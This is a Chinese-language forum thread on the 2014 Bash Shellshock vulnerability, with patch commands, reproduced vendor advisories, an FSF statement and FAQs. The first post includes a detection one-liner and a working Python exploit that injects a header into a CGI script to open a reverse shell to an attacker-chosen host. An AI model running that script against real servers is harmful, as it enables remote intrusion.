首頁 繪圖設計 工作閒聊 比賽活動 美術討論 標籤 圖片
Bash 安全性問題「SHELLSHOCK」: 2014 九月底發現,請儘速更新修補




Type(Type) 2015/1/30 17:40 (Since 2014/9/26 13:16)

Bash Security Bugs: 2014 九月底發現,請儘速更新修補(尤其是有 CGI-BIN bash 服務的 server

簡稱:ShellShock (當然,給他一個和 HeartBleed一樣的名字)ShellSHock 影響: All Unix/Linux/BSD/MacOS/Windows 有用 bash 都會受到影響ShellShock BASH 影響版本: => bash 1.14 ~ bash 4.3 (幾乎接近是 zero-day bug)參考:https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/http://seclists.org/oss-sec/2014/q3/666修補很簡單:@ Ubuntu / Debian$ apt-get update;apt-get upgrade$ apt-get update && sudo apt-get install --only-upgrade bash (單純更新 bash)@ Fedora/CentOS/Fedora$ yum update$ yum update bash (只更新 bash)當然,「安全」的前提是,還沒被用此漏洞入侵。漏洞可能影響的 scenario1. Apache HTTP Servers (mod_cgi and mod_cgid) + Bash CGI scripts 2. 特定的 DHCP clients3. OpenSSH server 使用 "ForeceCommand 參數"4. 相關網路服務,其 path 中有使用到未 patch 的 bash Q: 如何偵測?最簡單的 Sample Code,如下面這一行,如果你會看 "vulnerable" 被印出來,然後才看到 this is a test那就代表 bash 有 security bug代碼:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"




Example Code #2:
代碼:
##CVE-2014-6271 cgi-bin reverse shell#import httplib,urllib,sysif (len(sys.argv)<4):   print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]   print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]   exit(0)conn = httplib.HTTPConnection(sys.argv[1])reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]headers = {"Content-type": "application/x-www-form-urlencoded",   "test":reverse_shell }conn.request("GET",sys.argv[2],headers=headers)res = conn.getresponse()print res.status, res.reasondata = res.read()print data
Example Code #3:代碼:
$ gcc bug.c$ env TERM='() { :;}; echo vulnerable' a.outvulnerable#include <stdlib.h>int main(void){    return system("cat bug.c");}
Update your Ubuntu/Redhat/Fedora/Debian代碼:
$ ls -al /bin/bash-rwxr-xr-x 1 root root 959120 Mar 29  2013 /bin/bash$ apt-get update$ apt-get upgradeReading package lists... DoneBuilding dependency treeReading state information... DoneThe following packages have been kept back:  linux-image-virtualThe following packages will be upgraded:  apt apt-utils bash dbus firefox-locale-en libapt-inst1.4 libapt-pkg4.12  libdbus-1-3 libnss3 libnss3-1d10 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.Need to get 5,421 kB of archives.After this operation, 10.2 kB of additional disk space will be used.Do you want to continue [Y/n]?%  ls -al /bin/bash-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash


Type(Type) 2014/9/27 11:56

自由軟體基金會對於 GNU Bash "ShellShock" 發表的聲明

原文: http://www.fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability快速翻譯摘要如下:1. 一個重大的 Bash 安全性問題被發現於 GNU Bash,目前已經有暫時解法;而完整的解法正在動工中。所有使用 bash 的系統應該立即進行更新,並且監視 bash 相關的網路服務。2. 此 Bug 俗稱為 "ShellShock",在某些特定狀況下,可以讓攻擊者取得 root 權限,不論是直接透過 bash或者 call path 中有 bash 的(網路)應用。可參考: NVDhttps://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-71693. 因為 GNU Bash 為自由軟體且可靠好用,所以 ShellShock 影響範圍廣泛所幸的是是因為他是 GPL V3,所以能讓自由軟體開發者如Red Hat 快速的回應此 bug 並分享出 patch 讓各大上游開發者能夠同步修復。4. 每個人都可以同時自由的下載、檢視、補綴自己的 bash,不像是微軟(Microsoft) 或者蘋果(Apple),或者其他的私有軟體。(這篇文章還順便酸了 Microsoft & Apple 一把,不曉得 FSF 官方聲明為什麼一定要這樣...)5. 軟體自由是安全的大前提之一,保證每個人都可以檢視並偵測自己使用程式碼的安全性,進而改善、製造更安全的軟體。 6. 不管是自由軟體或者私有軟體,都不保證 Bug-Free;Bug 會發生,與他的「授權方式」完全無關。然而如果是在自由軟體發現的 bug ,每個人都有權限、權力、原始代碼來進行複製與修復;接著此 patch 很快會廣為自由免費的散佈至每個人手上。 這種自由度對於安全運算事關重大。7. 私有軟體(非自由軟體)依賴於一個「不平等(unjust)」的開發模式,他隱藏了原始碼,並剝奪了使用者的基本權力;這樣不僅僅讓安全缺失難以發現,並且容易讓這些開發商故意殖入可能有害的內容,並隱藏已經發現的嚴重問題。有報告指出,微軟曾經提供給政府的情報組織一些尚未修復的漏洞資訊。( http://www.computerworlduk.com/blogs/open-enterprise/how-can-any-company-ever-trust-microsoft-again-3569376/8. 自由軟體並不能保證你的安全,某些狀況下,有可能比起私有軟體更顯得容易發現漏洞。但比起「不容易發現的漏洞」,持續的監督、改善自由軟體,才是重點。9. BASH 和其他 GNU 軟體的開發,大部分都是由義務組織或個人義務來貢獻他們才智時間;我們正在檢視 Bash 的開發,並看增進對於 bash 計畫的資金贊助是否能夠避免未來發生類似問題;如果您或您的單位組織,有使用 bash 並對於支援 bash 有興趣,請聯絡我們 ( http://www.fsf.org/news/donate@fsf.org自由軟體基金會媒體窗口 John Sullivan Executive DirectorFree Software Foundation +1 (617) 542 5942 campaigns@fsf.org


Type(Type) 2014/9/27 13:41

Fedora Bash Update: Fedora 19, Fedora 20

From: updates@fedoraproject.org To: package-announce@lists.fedoraproject.org Subject: [SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19 Date: Fri, 26 Sep 2014 09:00:48 +0000Message-ID: <20140926090050.9FE1722338@bastion01.phx2.fedoraproject.org>--------------------------------------------------------------------------------Fedora Update NotificationFEDORA-2014-115142014-09-26 08:10:17--------------------------------------------------------------------------------Name : bashProduct : Fedora 19Version : 4.2.48Release : 2.fc19URL : http://www.gnu.org/software/bashSummary : The GNU Bourne Again shellDescription :The GNU Bourne Again shell (Bash) is a shell or command languageinterpreter that is compatible with the Bourne shell (sh). Bashincorporates useful features from the Korn shell (ksh) and the C shell(csh). Most sh scripts can be run by bash without modification.--------------------------------------------------------------------------------Update Information:This build should fix cve-2014-7169--------------------------------------------------------------------------------ChangeLog:* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2- CVE-2014-7169 Resolves: #1146319+* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1- Patchlevel 48* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2- Inhibit code injection - patch by Stephane Chazelas* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.47-1- Patchlevel 47* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.46-1- Patchlevel 46--------------------------------------------------------------------------------References: [ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment(Incomplete fix for CVE-2014-6271) https://bugzilla.redhat.com/show_bug.cgi?id=1146319--------------------------------------------------------------------------------This update can be installed with the "yum" update program. Usesu -c 'yum update bash' at the command line.For more information, refer to "Managing Software with yum",available at http://docs.fedoraproject.org/yum/.All packages are signed with the Fedora Project GPG key. More details on theGPG keys used by the Fedora Project can be found athttps://fedoraproject.org/keys--------------------------------------------------------------------------------From: updates@fedoraproject.org To: package-announce@lists.fedoraproject.org Subject: [SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20 Date: Fri, 26 Sep 2014 09:03:00 +0000Message-ID: <20140926090302.6FC4121113@bastion01.phx2.fedoraproject.org>--------------------------------------------------------------------------------Fedora Update NotificationFEDORA-2014-115272014-09-26 08:10:45--------------------------------------------------------------------------------Name : bashProduct : Fedora 20Version : 4.2.48Release : 2.fc20URL : http://www.gnu.org/software/bashSummary : The GNU Bourne Again shellDescription :The GNU Bourne Again shell (Bash) is a shell or command languageinterpreter that is compatible with the Bourne shell (sh). Bashincorporates useful features from the Korn shell (ksh) and the C shell(csh). Most sh scripts can be run by bash without modification.--------------------------------------------------------------------------------Update Information:This build should fix cve-2014-7169--------------------------------------------------------------------------------ChangeLog:* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2- CVE-2014-7169 Resolves: #1146319+* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1- Patchlevel 48* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-4- Inhibit code injection - patch by Stephane Chazelas* Mon Jul 21 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-3- Mention ulimit -c and -f block size in POSIX mode* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2- Proper patchlevel 47* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-1- Patchlevel 47* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.46-1- Patchlevel 46--------------------------------------------------------------------------------References: [ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment(Incomplete fix for CVE-2014-6271) https://bugzilla.redhat.com/show_bug.cgi?id=1146319--------------------------------------------------------------------------------This update can be installed with the "yum" update program. Usesu -c 'yum update bash' at the command line.For more information, refer to "Managing Software with yum",available at http://docs.fedoraproject.org/yum/.All packages are signed with the Fedora Project GPG key. More details on theGPG keys used by the Fedora Project can be found athttps://fedoraproject.org/keys--------------------------------------------------------------------------------

CentOS 5 / CentOS 6 / CentOS 7

From: Johnny Hughes <johnny@centos.org> To: centos-announce@centos.org Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 5 bash Security Update Date: Fri, 26 Sep 2014 02:16:02 +0000Message-ID: <20140926021602.GA3213@chakra.karan.org>CentOS Errata and Security Advisory 2014:1306 ImportantUpstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.htmlThe following updated files have been uploaded and are currently syncing to the mirrors: ( sha256sum Filename ) i386:9755e86ad8536c908f95340be308190b52989bfa0d9268a461c40a3f0d493bc7 bash-3.2-33.el5_10.4.i386.rpmx86_64:b1e14edd0d675c6fb0be64cb875fbd9fac208a58e427ea32f373c9359b35642c bash-3.2-33.el5_10.4.x86_64.rpmSource:b71bd90354d2724f256f9f23e113eea89c98b3ce923380657461cb78d34ab8da bash-3.2-33.el5_10.4.src.rpm-- Johnny HughesCentOS Project { http://www.centos.org/ }irc: hughesjr, #centos@irc.freenode.netFrom: Johnny Hughes <johnny@centos.org> To: centos-announce@centos.org Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 6 bash Security Update Date: Fri, 26 Sep 2014 02:24:20 +0000Message-ID: <20140926022420.GA62097@n04.lon1.karan.org>CentOS Errata and Security Advisory 2014:1306 ImportantUpstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.htmlThe following updated files have been uploaded and are currently syncing to the mirrors: ( sha256sum Filename ) i386:28a674dd09ca395b3021749ebf8928806ae981a325c02b8ead070e75cdae2cab bash-4.1.2-15.el6_5.2.i686.rpm333f57db85ea63636650d1b491c07a5d0ccb722e9353db5f22a62685d96c9da7bash-doc-4.1.2-15.el6_5.2.i686.rpmx86_64:72fb8fa60fce9ccd1f221ace44d7a29870856d9033819d2c3e75885881cf6a4abash-4.1.2-15.el6_5.2.x86_64.rpm18cde2ec120c8d351c60ae3901bb6706f4c97abbf2b87cdec5ed1ba4175c84a2bash-doc-4.1.2-15.el6_5.2.x86_64.rpmSource:d0a8f52d7db4c729c17188a2bd690aff2371f8ac86900dabb14b0df5aa1ff6a5 bash-4.1.2-15.el6_5.2.src.rpmFrom: Johnny Hughes <johnny@centos.org> To: centos-announce@centos.org Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 7 bash Security Update Date: Fri, 26 Sep 2014 02:23:24 +0000Message-ID: <20140926022324.GA61885@n04.lon1.karan.org>CentOS Errata and Security Advisory 2014:1306 ImportantUpstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.htmlThe following updated files have been uploaded and are currently syncing to the mirrors: ( sha256sum Filename ) x86_64:d2806c39117791707b6f528afd2bfa35b20a67f6ad40231057d6dd27f4eb7e36bash-4.2.45-5.el7_0.4.x86_64.rpm9a66662961d2a359b71387436b03e1e951473b10dbf450e480c6787d584dc70ebash-doc-4.2.45-5.el7_0.4.x86_64.rpmSource:b37570f9434b82c9f2df7920b1ab94e00039370b58ee1ab2c2235eeda53b88fb bash-4.2.45-5.el7_0.4.src.rpm



Red Hat v5, Red Hat v6, Red Hat v7 BASH Update

From: bugzilla@redhat.com To: rhsa-announce@redhat.com, enterprise-watch-list@redhat.com Subject: [RHSA-2014:1306-01] Important: bash security update Date: Fri, 26 Sep 2014 02:02:30 +0000Message-ID: <201409260154.s8Q1s9AP014275@int-mx13.intmail.prod.int.phx2.redhat.com>-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1===================================================================== Red Hat Security AdvisorySynopsis: Important: bash security updateAdvisory ID: RHSA-2014:1306-01Product: Red Hat Enterprise LinuxAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1306.htmlIssue date: 2014-09-26CVE Names: CVE-2014-7169 =====================================================================1. Summary:Updated bash packages that fix one security issue are now available for RedHat Enterprise Linux 5, 6, and 7.Red Hat Product Security has rated this update as having Important securityimpact. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available from the CVE link in theReferences section.2. Relevant releases/architectures:Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64Red Hat Enterprise Linux Client (v. 7) - x86_64Red Hat Enterprise Linux Client Optional (v. 7) - x86_64Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64Red Hat Enterprise Linux HPC Node (v. 6) - x86_64Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64Red Hat Enterprise Linux Workstation (v. 7) - x86_64Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_643. Description:The GNU Bourne Again shell (Bash) is a shell and command languageinterpreter compatible with the Bourne shell (sh). Bash is the defaultshell for Red Hat Enterprise Linux.It was found that the fix for CVE-2014-6271 was incomplete, and Bash stillallowed certain characters to be injected into other environments viaspecially crafted environment variables. An attacker could potentially usethis flaw to override or bypass environment restrictions to execute shellcommands. Certain services and applications allow remote unauthenticatedattackers to provide environment variables, allowing them to exploit thisissue. (CVE-2014-7169)Applications which directly create bash functions as environment variablesneed to be made aware of changes to the way names are handled by thisupdate. For more information see the Knowledgebase article athttps://access.redhat.com/articles/1200223Note: Docker users are advised to use "yum update" within their containers,and to commit the resulting changes.For additional information on CVE-2014-6271 and CVE-2014-7169, refer to theaforementioned Knowledgebase article.All bash users are advised to upgrade to these updated packages, whichcontain a backported patch to correct this issue.4. Solution:Before applying this update, make sure all previously released errata relevant to your system have been applied.This update is available via the Red Hat Network. Details on how to use theRed Hat Network to apply this update are available at https://access.redhat.com/articles/112585. Bugs fixed ( https://bugzilla.redhat.com/):1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix forCVE-2014-6271)6. Package List:Red Hat Enterprise Linux Desktop (v. 5 client):Source:bash-3.2-33.el5_11.4.src.rpmi386:bash-3.2-33.el5_11.4.i386.rpmbash-debuginfo-3.2-33.el5_11.4.i386.rpmx86_64:bash-3.2-33.el5_11.4.x86_64.rpmbash-debuginfo-3.2-33.el5_11.4.x86_64.rpmRed Hat Enterprise Linux (v. 5 server):Source:bash-3.2-33.el5_11.4.src.rpmi386:bash-3.2-33.el5_11.4.i386.rpmbash-debuginfo-3.2-33.el5_11.4.i386.rpmia64:bash-3.2-33.el5_11.4.i386.rpmbash-3.2-33.el5_11.4.ia64.rpmbash-debuginfo-3.2-33.el5_11.4.i386.rpmbash-debuginfo-3.2-33.el5_11.4.ia64.rpmppc:bash-3.2-33.el5_11.4.ppc.rpmbash-debuginfo-3.2-33.el5_11.4.ppc.rpms390x:bash-3.2-33.el5_11.4.s390x.rpmbash-debuginfo-3.2-33.el5_11.4.s390x.rpmx86_64:bash-3.2-33.el5_11.4.x86_64.rpmbash-debuginfo-3.2-33.el5_11.4.x86_64.rpmRed Hat Enterprise Linux Desktop (v. 6):Source:bash-4.1.2-15.el6_5.2.src.rpmi386:bash-4.1.2-15.el6_5.2.i686.rpmbash-debuginfo-4.1.2-15.el6_5.2.i686.rpmx86_64:bash-4.1.2-15.el6_5.2.x86_64.rpmbash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpmRed Hat Enterprise Linux Desktop Optional (v. 6):Source:bash-4.1.2-15.el6_5.2.src.rpmi386:bash-debuginfo-4.1.2-15.el6_5.2.i686.rpmbash-doc-4.1.2-15.el6_5.2.i686.rpmx86_64:bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpmbash-doc-4.1.2-15.el6_5.2.x86_64.rpmRed Hat Enterprise Linux HPC Node (v. 6):Source:bash-4.1.2-15.el6_5.2.src.rpmx86_64:bash-4.1.2-15.el6_5.2.x86_64.rpmbash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpmRed Hat Enterprise Linux HPC Node Optional (v. 6):Source:bash-4.1.2-15.el6_5.2.src.rpmx86_64:bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpmbash-doc-4.1.2-15.el6_5.2.x86_64.rpmRed Hat Enterprise Linux Server (v. 6):Source:bash-4.1.2-15.el6_5.2.src.rpmi386:bash-4.1.2-15.el6_5.2.i686.rpmbash-debuginfo-4.1.2-15.el6_5.2.i686.rpmppc64:bash-4.1.2-15.el6_5.2.ppc64.rpmbash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpms390x:bash-4.1.2-15.el6_5.2.s390x.rpmbash-debuginfo-4.1.2-15.el6_5.2.s390x.rpmx86_64:bash-4.1.2-15.el6_5.2.x86_64.rpmbash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpmRed Hat Enterprise Linux Server Optional (v. 6):Source:bash-4.1.2-15.el6_5.2.src.rpmi386:bash-debuginfo-4.1.2-15.el6_5.2.i686.rpmbash-doc-4.1.2-15.el6_5.2.i686.rpmppc64:bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpmbash-doc-4.1.2-15.el6_5.2.ppc64.rpms390x:bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpmbash-doc-4.1.2-15.el6_5.2.s390x.rpmx86_64:bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpmbash-doc-4.1.2-15.el6_5.2.x86_64.rpmRed Hat Enterprise Linux Workstation (v. 6):Source:bash-4.1.2-15.el6_5.2.src.rpmi386:bash-4.1.2-15.el6_5.2.i686.rpmbash-debuginfo-4.1.2-15.el6_5.2.i686.rpmx86_64:bash-4.1.2-15.el6_5.2.x86_64.rpmbash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpmRed Hat Enterprise Linux Workstation Optional (v. 6):Source:bash-4.1.2-15.el6_5.2.src.rpmi386:bash-debuginfo-4.1.2-15.el6_5.2.i686.rpmbash-doc-4.1.2-15.el6_5.2.i686.rpmx86_64:bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpmbash-doc-4.1.2-15.el6_5.2.x86_64.rpmRed Hat Enterprise Linux Client (v. 7):Source:bash-4.2.45-5.el7_0.4.src.rpmx86_64:bash-4.2.45-5.el7_0.4.x86_64.rpmbash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpmRed Hat Enterprise Linux Client Optional (v. 7):x86_64:bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpmbash-doc-4.2.45-5.el7_0.4.x86_64.rpmRed Hat Enterprise Linux ComputeNode (v. 7):Source:bash-4.2.45-5.el7_0.4.src.rpmx86_64:bash-4.2.45-5.el7_0.4.x86_64.rpmbash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpmRed Hat Enterprise Linux ComputeNode Optional (v. 7):x86_64:bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpmbash-doc-4.2.45-5.el7_0.4.x86_64.rpmRed Hat Enterprise Linux Server (v. 7):Source:bash-4.2.45-5.el7_0.4.src.rpmppc64:bash-4.2.45-5.el7_0.4.ppc64.rpmbash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpms390x:bash-4.2.45-5.el7_0.4.s390x.rpmbash-debuginfo-4.2.45-5.el7_0.4.s390x.rpmx86_64:bash-4.2.45-5.el7_0.4.x86_64.rpmbash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpmRed Hat Enterprise Linux Server Optional (v. 7):ppc64:bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpmbash-doc-4.2.45-5.el7_0.4.ppc64.rpms390x:bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpmbash-doc-4.2.45-5.el7_0.4.s390x.rpmx86_64:bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpmbash-doc-4.2.45-5.el7_0.4.x86_64.rpmRed Hat Enterprise Linux Workstation (v. 7):Source:bash-4.2.45-5.el7_0.4.src.rpmx86_64:bash-4.2.45-5.el7_0.4.x86_64.rpmbash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpmRed Hat Enterprise Linux Workstation Optional (v. 7):x86_64:bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpmbash-doc-4.2.45-5.el7_0.4.x86_64.rpmThese packages are GPG signed by Red Hat for security. Our key anddetails on how to verify the signature are available from#package">https://access.redhat.com/security/team/key/#package7. References:https://www.redhat.com/security/data/cve/CVE-2014-7169.htmlhttps://access.redhat.com/security/updates/classification...https://access.redhat.com/articles/12002238. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2014 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iD8DBQFUJMc4XlSAg2UNWIIRAsowAKCeLFE4QctUYTBC7bvqd6RTgUMptACcC2jtwqMN2oFvaGhf5SqiZHqpyOA==Unt1-----END PGP SIGNATURE-----

Ubuntu 10.04 / 12.04 / 14.04 BASH Update

From: Marc Deslauriers <marc.deslauriers@canonical.com> To: ubuntu-security-announce@lists.ubuntu.com Subject: [USN-2363-1] Bash vulnerability Date: Thu, 25 Sep 2014 18:35:21 -0400Message-ID: <542498A9.6020900@canonical.com>==========================================================================Ubuntu Security Notice USN-2363-1September 25, 2014bash vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTS- Ubuntu 12.04 LTS- Ubuntu 10.04 LTSSummary:Bash allowed bypassing environment restrictions in certain environments.Software Description:- bash: GNU Bourne Again SHellDetails:Tavis Ormandy discovered that the security fix for Bash included inUSN-2362-1 was incomplete. An attacker could use this issue to bypasscertain environment restrictions. (CVE-2014-7169)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS: bash 4.3-7ubuntu1.2Ubuntu 12.04 LTS: bash 4.2-2ubuntu2.3Ubuntu 10.04 LTS: bash 4.1-2ubuntu3.2In general, a standard system update will make all the necessary changes.References: http://www.ubuntu.com/usn/usn-2363-1 CVE-2014-7169Package Information: https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.2 https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.3 https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.2


Type(Type) 2014/9/27 15:57 (Since 2014/9/27 14:33)

Related ShellShock References


Type(Type) 2014/9/27 14:40

Ubuntu 10.04/12.04/14.04 有新的更新

代碼:
$ ls -al /bin/bash-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash$ md5sum /bin/bashd63ff62f142e76205e89e4a4de553fec  /bin/bash$ apt-get upgrade[14:38] > apt-get upgradeReading package lists... DoneBuilding dependency treeReading state information... DoneThe following packages will be upgraded:  bash grub-common2 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.Need to get 2,715 kB of archives.After this operation, 0 B of additional disk space will be used.Do you want to continue [Y/n]? yGet:1 http://archive.ubuntu.com/ubuntu/ precise-updates/main bash amd64 4.2-2ubuntu2.3 [641 kB]Get:2 http://archive.ubuntu.com/ubuntu/ precise-updates/main grub-common amd64 1.99-21ubuntu3.17 [2,074 kB]Fetched 2,715 kB in 2s (1,129 kB/s)(Reading database ... 29737 files and directories currently installed.)Preparing to replace bash 4.2-2ubuntu2.2 (using .../bash_4.2-2ubuntu2.3_amd64.deb) ...Unpacking replacement bash ...Processing triggers for man-db ...Setting up bash (4.2-2ubuntu2.3) ...update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode.(Reading database ... 29737 files and directories currently installed.)Preparing to replace grub-common 1.99-21ubuntu3.16 (using .../grub-common_1.99-21ubuntu3.17_amd64.deb) ...Unpacking replacement grub-common ...Processing triggers for ureadahead ...Processing triggers for man-db ...Setting up grub-common (1.99-21ubuntu3.17) ...$  ls -al /bin/bash-rwxr-xr-x 1 root root 959120  Sep 25 14:50 /bin/bash
$ md5sum /bin/bash5ee533c7cd3a8246b4a3d7a29ffbe0b2 /bin/bash (Ubuntu 12.04 LTS x86_64 bash)$ md5sum /bin/basheb8a956c0a1164b84262505a629e8a1f /bin/bash (Ubuntu 14.04 LTS x86_64 bash)


Type(Type) 2014/9/28 10:24




bash update 09/28

代碼:
$ apt-get upgradeReading package lists... DoneBuilding dependency treeReading state information... DoneCalculating upgrade... DoneThe following packages will be upgraded:  bash1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.Need to get 576 kB of archives.After this operation, 8192 B of additional disk space will be used.Do you want to continue? [Y/n] yPreparing to unpack .../bash_4.3-7ubuntu1.4_amd64.deb ...Unpacking bash (4.3-7ubuntu1.4) over (4.3-7ubuntu1.3) ...Processing triggers for man-db (2.6.7.1-1) ...Processing triggers for install-info (5.2.0.dfsg.1-2) ...Setting up bash (4.3-7ubuntu1.4) ...update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode$ ls -al /bin/bash-rwxr-xr-x 1 root root 1021112  Sep 27 16:04 /bin/bash$ md5sum /bin/bashb81de36b3ef3bb64229833c055560c0f  /bin/bash$ bash --versionGNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)Copyright (C) 2013 Free Software Foundation, Inc.License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>This is free software; you are free to change and redistribute it.There is NO WARRANTY, to the extent permitted by law.


service(staff) 2014/10/9 13:52

David Wheeler 對於 Shellshock 的調查論文 (2014/10/08)

建議閱讀=> http://www.dwheeler.com/essays/shellshock.html更多延伸閱讀:https://host-project.org/content/are-you-open-being-shell-shockedhttp://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspxhttp://en.wikipedia.org/wiki/Shellshockhttp://www.futuresouth.us/wordpress/?p=5 (Yahoo! 疑似被入侵)



最常被問到的 Shellshock 問題 (ash, tcsh, csh, mksh)

Q: 我們家的某某 OOXX Embedded Box 的 Shell (not bash!) 是否有此問題?Ans1: => 假設系統使用 Busybox 環境,那理論上應該不用擔心,Busybox Shell 是 "ash" 無此問題=> http://en.wikipedia.org/wiki/Almquist_shellAns2: => 假設是 Android OS,那理論上應該不用擔心,Android 是用 "mksh"=> http://www.all-things-android.com/content/mirbsd-korn-shell-android-shellAns3: ==> 其他如 "csh" "tcsh",一般來講,並「沒有」在這次受災範圍內,除非你有特別去 patch 他;因為這次的 bash bug 是一個特殊的 function import/export 功能引起,其他 shell 如果沒有此功能,理論上不用擔心。


(5,748 views)
[更多討論] 討論區 Windows, Linux, Perl, PHP, C/C++, Driver, Web 理論、應用、硬體、軟體


"Bash 安全性問題「SHELLSHOCK」: 2014 九月底發現,請儘速更新修補" 傳統頁面(電腦版)

首頁 繪圖設計 工作閒聊 比賽活動 美術討論 標籤 圖片
傳統桌面版
© Vovo2000.com Mobile Version 小哈手機版 2019